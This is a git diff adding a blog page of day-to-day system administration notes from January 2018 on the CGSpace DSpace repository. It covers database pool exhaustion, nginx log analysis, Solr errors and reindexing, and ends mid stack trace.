Binary files /dev/null and b/docs/2017/06/wle-theme-test-a.png differ
diff --git a/docs/2017/06/wle-theme-test-b.png b/docs/2017/06/wle-theme-test-b.png
new file mode 100644
index 000000000..e6cd5c8bd
Binary files /dev/null and b/docs/2017/06/wle-theme-test-b.png differ
diff --git a/docs/2017/07/lead-author-test.png b/docs/2017/07/lead-author-test.png
new file mode 100644
index 000000000..1543979f5
Binary files /dev/null and b/docs/2017/07/lead-author-test.png differ
diff --git a/docs/2017/08/cifor-oai-harvesting.png b/docs/2017/08/cifor-oai-harvesting.png
new file mode 100644
index 000000000..6aa2db071
Binary files /dev/null and b/docs/2017/08/cifor-oai-harvesting.png differ
diff --git a/docs/2017/08/postgresql-connections-cgspace.png b/docs/2017/08/postgresql-connections-cgspace.png
new file mode 100644
index 000000000..982ffe910
Binary files /dev/null and b/docs/2017/08/postgresql-connections-cgspace.png differ
diff --git a/docs/2017/09/10947-2919-after.jpg b/docs/2017/09/10947-2919-after.jpg
new file mode 100644
index 000000000..183c19b02
Binary files /dev/null and b/docs/2017/09/10947-2919-after.jpg differ
diff --git a/docs/2017/09/10947-2919-before.jpg b/docs/2017/09/10947-2919-before.jpg
new file mode 100644
index 000000000..0ba72ea25
Binary files /dev/null and b/docs/2017/09/10947-2919-before.jpg differ
diff --git a/docs/2017/09/cgspace-memory-week.png b/docs/2017/09/cgspace-memory-week.png
new file mode 100644
index 000000000..b5710018a
Binary files /dev/null and b/docs/2017/09/cgspace-memory-week.png differ
diff --git a/docs/2017/09/dspace-test-memory-week.png b/docs/2017/09/dspace-test-memory-week.png
new file mode 100644
index 000000000..a6cd80e78
Binary files /dev/null and b/docs/2017/09/dspace-test-memory-week.png differ
diff --git a/docs/2017/10/dspace-thumbnail-box-shadow.png b/docs/2017/10/dspace-thumbnail-box-shadow.png
new file mode 100644
index 000000000..a39b84adf
Binary files /dev/null and b/docs/2017/10/dspace-thumbnail-box-shadow.png differ
diff --git a/docs/2017/10/dspace-thumbnail-original.png b/docs/2017/10/dspace-thumbnail-original.png
new file mode 100644
index 000000000..1e1a27dff
Binary files /dev/null and b/docs/2017/10/dspace-thumbnail-original.png differ
diff --git a/docs/2017/10/google-search-console-2.png b/docs/2017/10/google-search-console-2.png
new file mode 100644
index 000000000..5e0fbd4df
Binary files /dev/null and b/docs/2017/10/google-search-console-2.png differ
diff --git a/docs/2017/10/google-search-console.png b/docs/2017/10/google-search-console.png
new file mode 100644
index 000000000..16ab3d709
Binary files /dev/null and b/docs/2017/10/google-search-console.png differ
diff --git a/docs/2017/10/google-search-results.png b/docs/2017/10/google-search-results.png
new file mode 100644
index 000000000..4e0c19a8b
Binary files /dev/null and b/docs/2017/10/google-search-results.png differ
diff --git a/docs/2017/10/search-console-change-address-error.png b/docs/2017/10/search-console-change-address-error.png
new file mode 100644
index 000000000..95fe4d9c5
Binary files /dev/null and b/docs/2017/10/search-console-change-address-error.png differ
diff --git a/docs/2017/11/add-author.png b/docs/2017/11/add-author.png
new file mode 100644
index 000000000..26f12875e
Binary files /dev/null and b/docs/2017/11/add-author.png differ
diff --git a/docs/2017/11/author-lookup.png b/docs/2017/11/author-lookup.png
new file mode 100644
index 000000000..5d9d95831
Binary files /dev/null and b/docs/2017/11/author-lookup.png differ
diff --git a/docs/2017/11/baidu-robotstxt.png b/docs/2017/11/baidu-robotstxt.png
new file mode 100644
index 000000000..29cb66563
Binary files /dev/null and b/docs/2017/11/baidu-robotstxt.png differ
diff --git a/docs/2017/11/jconsole-sessions.png b/docs/2017/11/jconsole-sessions.png
new file mode 100644
index 000000000..9af006542
Binary files /dev/null and b/docs/2017/11/jconsole-sessions.png differ
diff --git a/docs/2017/11/postgres-connections-month.png b/docs/2017/11/postgres-connections-month.png
new file mode 100644
index 000000000..a7e533174
Binary files /dev/null and b/docs/2017/11/postgres-connections-month.png differ
diff --git a/docs/2017/11/postgres-connections-week.png b/docs/2017/11/postgres-connections-week.png
new file mode 100644
index 000000000..626b3f204
Binary files /dev/null and b/docs/2017/11/postgres-connections-week.png differ
diff --git a/docs/2017/11/tomcat-jvm-cms.png b/docs/2017/11/tomcat-jvm-cms.png
new file mode 100644
index 000000000..095cb6430
Binary files /dev/null and b/docs/2017/11/tomcat-jvm-cms.png differ
diff --git a/docs/2017/11/tomcat-jvm-g1gc.png b/docs/2017/11/tomcat-jvm-g1gc.png
new file mode 100644
index 000000000..724b0419f
Binary files /dev/null and b/docs/2017/11/tomcat-jvm-g1gc.png differ
diff --git a/docs/2017/12/postgres-connections-cgspace.png b/docs/2017/12/postgres-connections-cgspace.png
new file mode 100644
index 000000000..908f3db3d
Binary files /dev/null and b/docs/2017/12/postgres-connections-cgspace.png differ
diff --git a/docs/2017/12/postgres-connections-month-cgspace-2.png b/docs/2017/12/postgres-connections-month-cgspace-2.png
new file mode 100644
index 000000000..11731d504
Binary files /dev/null and b/docs/2017/12/postgres-connections-month-cgspace-2.png differ
diff --git a/docs/2017/12/postgres-connections-month-cgspace.png b/docs/2017/12/postgres-connections-month-cgspace.png
new file mode 100644
index 000000000..27602b450
Binary files /dev/null and b/docs/2017/12/postgres-connections-month-cgspace.png differ
diff --git a/docs/2017/12/postgres-connections-month.png b/docs/2017/12/postgres-connections-month.png
new file mode 100644
index 000000000..c7e64a76e
Binary files /dev/null and b/docs/2017/12/postgres-connections-month.png differ
diff --git a/docs/2017/12/postgres-connections-week-dspacetest.png b/docs/2017/12/postgres-connections-week-dspacetest.png
new file mode 100644
index 000000000..a79fffe3d
Binary files /dev/null and b/docs/2017/12/postgres-connections-week-dspacetest.png differ
diff --git a/docs/2018-01/index.html b/docs/2018-01/index.html
new file mode 100644
index 000000000..b38cfc931
--- /dev/null
+++ b/docs/2018-01/index.html
@@ -0,0 +1,1506 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="January, 2018" />
+<meta property="og:description" content="2018-01-02
+
+Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time
+I didn&rsquo;t get any load alerts from Linode and the REST and XMLUI logs don&rsquo;t show anything out of the ordinary
+The nginx logs show HTTP 200s until 02/Jan/2018:11:27:17 &#43;0000 when Uptime Robot got an HTTP 500
+In dspace.log around that time I see many errors like &ldquo;Client closed the connection before file download was complete&rdquo;
+And just before that I see this:
+
+Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
+
+Ah hah! So the pool was actually empty!
+I need to increase that, let&rsquo;s try to bump it up from 50 to 75
+After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&rsquo;t know what the hell Uptime Robot saw
+I notice this error quite a few times in dspace.log:
+
+2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
+
+And there are many of these errors every day for the past month:
+
+$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
+dspace.log.2017-11-21:4
+dspace.log.2017-11-22:1
+dspace.log.2017-11-23:4
+dspace.log.2017-11-24:11
+dspace.log.2017-11-25:0
+dspace.log.2017-11-26:1
+dspace.log.2017-11-27:7
+dspace.log.2017-11-28:21
+dspace.log.2017-11-29:31
+dspace.log.2017-11-30:15
+dspace.log.2017-12-01:15
+dspace.log.2017-12-02:20
+dspace.log.2017-12-03:38
+dspace.log.2017-12-04:65
+dspace.log.2017-12-05:43
+dspace.log.2017-12-06:72
+dspace.log.2017-12-07:27
+dspace.log.2017-12-08:15
+dspace.log.2017-12-09:29
+dspace.log.2017-12-10:35
+dspace.log.2017-12-11:20
+dspace.log.2017-12-12:44
+dspace.log.2017-12-13:36
+dspace.log.2017-12-14:59
+dspace.log.2017-12-15:104
+dspace.log.2017-12-16:53
+dspace.log.2017-12-17:66
+dspace.log.2017-12-18:83
+dspace.log.2017-12-19:101
+dspace.log.2017-12-20:74
+dspace.log.2017-12-21:55
+dspace.log.2017-12-22:66
+dspace.log.2017-12-23:50
+dspace.log.2017-12-24:85
+dspace.log.2017-12-25:62
+dspace.log.2017-12-26:49
+dspace.log.2017-12-27:30
+dspace.log.2017-12-28:54
+dspace.log.2017-12-29:68
+dspace.log.2017-12-30:89
+dspace.log.2017-12-31:53
+dspace.log.2018-01-01:45
+dspace.log.2018-01-02:34
+
+Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2018-01/" />
+<meta property="article:published_time" content="2018-01-02T08:35:54-08:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="January, 2018"/>
+<meta name="twitter:description" content="2018-01-02
+
+Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time
+I didn&rsquo;t get any load alerts from Linode and the REST and XMLUI logs don&rsquo;t show anything out of the ordinary
+The nginx logs show HTTP 200s until 02/Jan/2018:11:27:17 &#43;0000 when Uptime Robot got an HTTP 500
+In dspace.log around that time I see many errors like &ldquo;Client closed the connection before file download was complete&rdquo;
+And just before that I see this:
+
+Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
+
+Ah hah! So the pool was actually empty!
+I need to increase that, let&rsquo;s try to bump it up from 50 to 75
+After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&rsquo;t know what the hell Uptime Robot saw
+I notice this error quite a few times in dspace.log:
+
+2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
+
+And there are many of these errors every day for the past month:
+
+$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
+dspace.log.2017-11-21:4
+dspace.log.2017-11-22:1
+dspace.log.2017-11-23:4
+dspace.log.2017-11-24:11
+dspace.log.2017-11-25:0
+dspace.log.2017-11-26:1
+dspace.log.2017-11-27:7
+dspace.log.2017-11-28:21
+dspace.log.2017-11-29:31
+dspace.log.2017-11-30:15
+dspace.log.2017-12-01:15
+dspace.log.2017-12-02:20
+dspace.log.2017-12-03:38
+dspace.log.2017-12-04:65
+dspace.log.2017-12-05:43
+dspace.log.2017-12-06:72
+dspace.log.2017-12-07:27
+dspace.log.2017-12-08:15
+dspace.log.2017-12-09:29
+dspace.log.2017-12-10:35
+dspace.log.2017-12-11:20
+dspace.log.2017-12-12:44
+dspace.log.2017-12-13:36
+dspace.log.2017-12-14:59
+dspace.log.2017-12-15:104
+dspace.log.2017-12-16:53
+dspace.log.2017-12-17:66
+dspace.log.2017-12-18:83
+dspace.log.2017-12-19:101
+dspace.log.2017-12-20:74
+dspace.log.2017-12-21:55
+dspace.log.2017-12-22:66
+dspace.log.2017-12-23:50
+dspace.log.2017-12-24:85
+dspace.log.2017-12-25:62
+dspace.log.2017-12-26:49
+dspace.log.2017-12-27:30
+dspace.log.2017-12-28:54
+dspace.log.2017-12-29:68
+dspace.log.2017-12-30:89
+dspace.log.2017-12-31:53
+dspace.log.2018-01-01:45
+dspace.log.2018-01-02:34
+
+Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "January, 2018",
+  "url": "https://alanorth.github.io/cgspace-notes/2018-01/",
+  "wordCount": "7940",
+  "datePublished": "2018-01-02T08:35:54-08:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2018-01/">
+
+    <title>January, 2018 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-01/">January, 2018</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2018-01-02T08:35:54-08:00">Tue Jan 02, 2018</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-01-02">2018-01-02</h2>
+<ul>
+<li>Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time</li>
+<li>I didn&rsquo;t get any load alerts from Linode and the REST and XMLUI logs don&rsquo;t show anything out of the ordinary</li>
+<li>The nginx logs show HTTP 200s until <code>02/Jan/2018:11:27:17 +0000</code> when Uptime Robot got an HTTP 500</li>
+<li>In dspace.log around that time I see many errors like &ldquo;Client closed the connection before file download was complete&rdquo;</li>
+<li>And just before that I see this:</li>
+</ul>
+<pre tabindex="0"><code>Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
+</code></pre><ul>
+<li>Ah hah! So the pool was actually empty!</li>
+<li>I need to increase that, let&rsquo;s try to bump it up from 50 to 75</li>
+<li>After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&rsquo;t know what the hell Uptime Robot saw</li>
+<li>I notice this error quite a few times in dspace.log:</li>
+</ul>
+<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
+</code></pre><ul>
+<li>And there are many of these errors every day for the past month:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
+dspace.log.2017-11-21:4
+dspace.log.2017-11-22:1
+dspace.log.2017-11-23:4
+dspace.log.2017-11-24:11
+dspace.log.2017-11-25:0
+dspace.log.2017-11-26:1
+dspace.log.2017-11-27:7
+dspace.log.2017-11-28:21
+dspace.log.2017-11-29:31
+dspace.log.2017-11-30:15
+dspace.log.2017-12-01:15
+dspace.log.2017-12-02:20
+dspace.log.2017-12-03:38
+dspace.log.2017-12-04:65
+dspace.log.2017-12-05:43
+dspace.log.2017-12-06:72
+dspace.log.2017-12-07:27
+dspace.log.2017-12-08:15
+dspace.log.2017-12-09:29
+dspace.log.2017-12-10:35
+dspace.log.2017-12-11:20
+dspace.log.2017-12-12:44
+dspace.log.2017-12-13:36
+dspace.log.2017-12-14:59
+dspace.log.2017-12-15:104
+dspace.log.2017-12-16:53
+dspace.log.2017-12-17:66
+dspace.log.2017-12-18:83
+dspace.log.2017-12-19:101
+dspace.log.2017-12-20:74
+dspace.log.2017-12-21:55
+dspace.log.2017-12-22:66
+dspace.log.2017-12-23:50
+dspace.log.2017-12-24:85
+dspace.log.2017-12-25:62
+dspace.log.2017-12-26:49
+dspace.log.2017-12-27:30
+dspace.log.2017-12-28:54
+dspace.log.2017-12-29:68
+dspace.log.2017-12-30:89
+dspace.log.2017-12-31:53
+dspace.log.2018-01-01:45
+dspace.log.2018-01-02:34
+</code></pre><ul>
+<li>Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains</li>
+</ul>
+<h2 id="2018-01-03">2018-01-03</h2>
+<ul>
+<li>I woke up to more up and down of CGSpace, this time UptimeRobot noticed a few rounds of up and down of a few minutes each and Linode also notified of high CPU load from 12 to 2 PM</li>
+<li>Looks like I need to increase the database pool size again:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
+dspace.log.2018-01-01:0
+dspace.log.2018-01-02:1972
+dspace.log.2018-01-03:1909
+</code></pre><ul>
+<li>For some reason there were a lot of &ldquo;active&rdquo; connections last night:</li>
+</ul>
+<p><img src="/cgspace-notes/2018/01/postgres_connections-day.png" alt="CGSpace PostgreSQL connections"></p>
+<ul>
+<li>The active IPs in XMLUI are:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;3/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    607 40.77.167.141
+    611 2a00:23c3:8c94:7800:392c:a491:e796:9c50
+    663 188.226.169.37
+    759 157.55.39.245
+    887 68.180.229.254
+   1037 157.55.39.175
+   1068 216.244.66.245
+   1495 66.249.64.91
+   1934 104.196.152.243
+   2219 134.155.96.78
+</code></pre><ul>
+<li>134.155.96.78 appears to be at the University of Mannheim in Germany</li>
+<li>They identify as: Mozilla/5.0 (compatible; heritrix/3.2.0 +http://ifm.uni-mannheim.de)</li>
+<li>This appears to be the <a href="https://github.com/internetarchive/heritrix3">Internet Archive&rsquo;s open source bot</a></li>
+<li>They seem to be re-using their Tomcat session so I don&rsquo;t need to do anything to them just yet:</li>
+</ul>
+<pre tabindex="0"><code>$ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+2
+</code></pre><ul>
+<li>The API logs show the normal users:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;3/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+     32 207.46.13.182
+     38 40.77.167.132
+     38 68.180.229.254
+     43 66.249.64.91
+     46 40.77.167.141
+     49 157.55.39.245
+     79 157.55.39.175
+   1533 50.116.102.77
+   4069 70.32.83.92
+   9355 45.5.184.196
+</code></pre><ul>
+<li>In other related news I see a sizeable amount of requests coming from python-requests</li>
+<li>For example, just in the last day there were 1700!</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -c python-requests
+1773
+</code></pre><ul>
+<li>But they come from hundreds of IPs, many of which are 54.x.x.x:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail -n 30
+      9 54.144.87.92
+      9 54.146.222.143
+      9 54.146.249.249
+      9 54.158.139.206
+      9 54.161.235.224
+      9 54.163.41.19
+      9 54.163.4.51
+      9 54.196.195.107
+      9 54.198.89.134
+      9 54.80.158.113
+     10 54.198.171.98
+     10 54.224.53.185
+     10 54.226.55.207
+     10 54.227.8.195
+     10 54.242.234.189
+     10 54.242.238.209
+     10 54.80.100.66
+     11 54.161.243.121
+     11 54.205.154.178
+     11 54.234.225.84
+     11 54.87.23.173
+     11 54.90.206.30
+     12 54.196.127.62
+     12 54.224.242.208
+     12 54.226.199.163
+     13 54.162.149.249
+     13 54.211.182.255
+     19 50.17.61.150
+     21 54.211.119.107
+    139 164.39.7.62
+</code></pre><ul>
+<li>I have no idea what these are but they seem to be coming from Amazon&hellip;</li>
+<li>I guess for now I just have to increase the database connection pool&rsquo;s max active</li>
+<li>It&rsquo;s currently 75 and normally I&rsquo;d just bump it by 25 but let me be a bit daring and push it by 50 to 125, because I used to see at least 121 connections in pg_stat_activity before when we were using the shitty default pooling</li>
+</ul>
+<h2 id="2018-01-04">2018-01-04</h2>
+<ul>
+<li>CGSpace went down and up a bunch of times last night and ILRI staff were complaining a lot last night</li>
+<li>The XMLUI logs show this activity:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;4/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    968 197.211.63.81
+    981 213.55.99.121
+   1039 66.249.64.93
+   1258 157.55.39.175
+   1273 207.46.13.182
+   1311 157.55.39.191
+   1319 157.55.39.197
+   1775 66.249.64.78
+   2216 104.196.152.243
+   3366 66.249.64.91
+</code></pre><ul>
+<li>Again we ran out of PostgreSQL database connections, even after bumping the pool max active limit from 50 to 75 to 125 yesterday!</li>
+</ul>
+<pre tabindex="0"><code>2018-01-04 07:36:08,089 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
+org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-256] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:125; busy:125; idle:0; lastwait:5000].
+</code></pre><ul>
+<li>So for this week that is the number one problem!</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
+dspace.log.2018-01-01:0
+dspace.log.2018-01-02:1972
+dspace.log.2018-01-03:1909
+dspace.log.2018-01-04:1559
+</code></pre><ul>
+<li>I will just bump the connection limit to 300 because I&rsquo;m fucking fed up with this shit</li>
+<li>Once I get back to Amman I will have to try to create different database pools for different web applications, like recently discussed on the dspace-tech mailing list</li>
+<li>Create accounts on CGSpace for two CTA staff <a href="mailto:km4ard@cta.int">km4ard@cta.int</a> and <a href="mailto:bheenick@cta.int">bheenick@cta.int</a></li>
+</ul>
+<h2 id="2018-01-05">2018-01-05</h2>
+<ul>
+<li>Peter said that CGSpace was down last night and Tsega restarted Tomcat</li>
+<li>I don&rsquo;t see any alerts from Linode or UptimeRobot, and there are no PostgreSQL connection errors in the dspace logs for today:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
+dspace.log.2018-01-01:0
+dspace.log.2018-01-02:1972
+dspace.log.2018-01-03:1909
+dspace.log.2018-01-04:1559
+dspace.log.2018-01-05:0
+</code></pre><ul>
+<li>Daniel asked for help with their DAGRIS server (linode2328112) that has no disk space</li>
+<li>I had a look and there is one Apache 2 log file that is 73GB, with lots of this:</li>
+</ul>
+<pre tabindex="0"><code>[Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for &#34;9-16-1-RV.doc&#34; in &#34;/home/files/journals/6//articles/9/&#34;. Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
+</code></pre><ul>
+<li>I will delete the log file for now and tell Danny</li>
+<li>Also, I&rsquo;m still seeing a hundred or so of the &ldquo;ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer&rdquo; errors in dspace logs, I need to search the dspace-tech mailing list to see what the cause is</li>
+<li>I will run a full Discovery reindex in the mean time to see if it&rsquo;s something wrong with the Discovery Solr core</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
+
+real    110m43.985s
+user    15m24.960s
+sys     3m14.890s
+</code></pre><ul>
+<li>Reboot CGSpace and DSpace Test for new kernels (4.14.12-x86_64-linode92) that partially mitigate the <a href="https://blog.linode.com/2018/01/03/cpu-vulnerabilities-meltdown-spectre/">Spectre and Meltdown CPU vulnerabilities</a></li>
+</ul>
+<h2 id="2018-01-06">2018-01-06</h2>
+<ul>
+<li>I&rsquo;m still seeing Solr errors in the DSpace logs even after the full reindex yesterday:</li>
+</ul>
+<pre tabindex="0"><code>org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1983+TO+1989]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
+</code></pre><ul>
+<li>I posted a message to the dspace-tech mailing list to see if anyone can help</li>
+</ul>
+<h2 id="2018-01-09">2018-01-09</h2>
+<ul>
+<li>Advise Sisay about blank lines in some IITA records</li>
+<li>Generate a list of author affiliations for Peter to clean up:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
+COPY 4515
+</code></pre><h2 id="2018-01-10">2018-01-10</h2>
+<ul>
+<li>I looked to see what happened to this year&rsquo;s Solr statistics sharding task that should have run on 2018-01-01 and of course it failed:</li>
+</ul>
+<pre tabindex="0"><code>Moving: 81742 into core statistics-2010
+Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2010
+org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2010
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:566)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.dspace.statistics.SolrLogger.shardSolrIndex(SourceFile:2243)
+        at org.dspace.statistics.util.StatisticsClient.main(StatisticsClient.java:106)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+Caused by: org.apache.http.client.ClientProtocolException
+        at org.apache.http.impl.client.AbstractHttpClient.doExecute(AbstractHttpClient.java:867)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:82)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:106)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:57)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:448)
+        ... 10 more
+Caused by: org.apache.http.client.NonRepeatableRequestException: Cannot retry request with a non-repeatable request entity.  The cause lists the reason the original request failed.
+        at org.apache.http.impl.client.DefaultRequestDirector.tryExecute(DefaultRequestDirector.java:659)
+        at org.apache.http.impl.client.DefaultRequestDirector.execute(DefaultRequestDirector.java:487)
+        at org.apache.http.impl.client.AbstractHttpClient.doExecute(AbstractHttpClient.java:863)
+        ... 14 more
+Caused by: java.net.SocketException: Connection reset
+        at java.net.SocketOutputStream.socketWrite(SocketOutputStream.java:115)
+        at java.net.SocketOutputStream.write(SocketOutputStream.java:155)
+        at org.apache.http.impl.io.AbstractSessionOutputBuffer.flushBuffer(AbstractSessionOutputBuffer.java:159)
+        at org.apache.http.impl.io.AbstractSessionOutputBuffer.write(AbstractSessionOutputBuffer.java:179)
+        at org.apache.http.impl.io.ChunkedOutputStream.flushCacheWithAppend(ChunkedOutputStream.java:124)
+        at org.apache.http.impl.io.ChunkedOutputStream.write(ChunkedOutputStream.java:181)
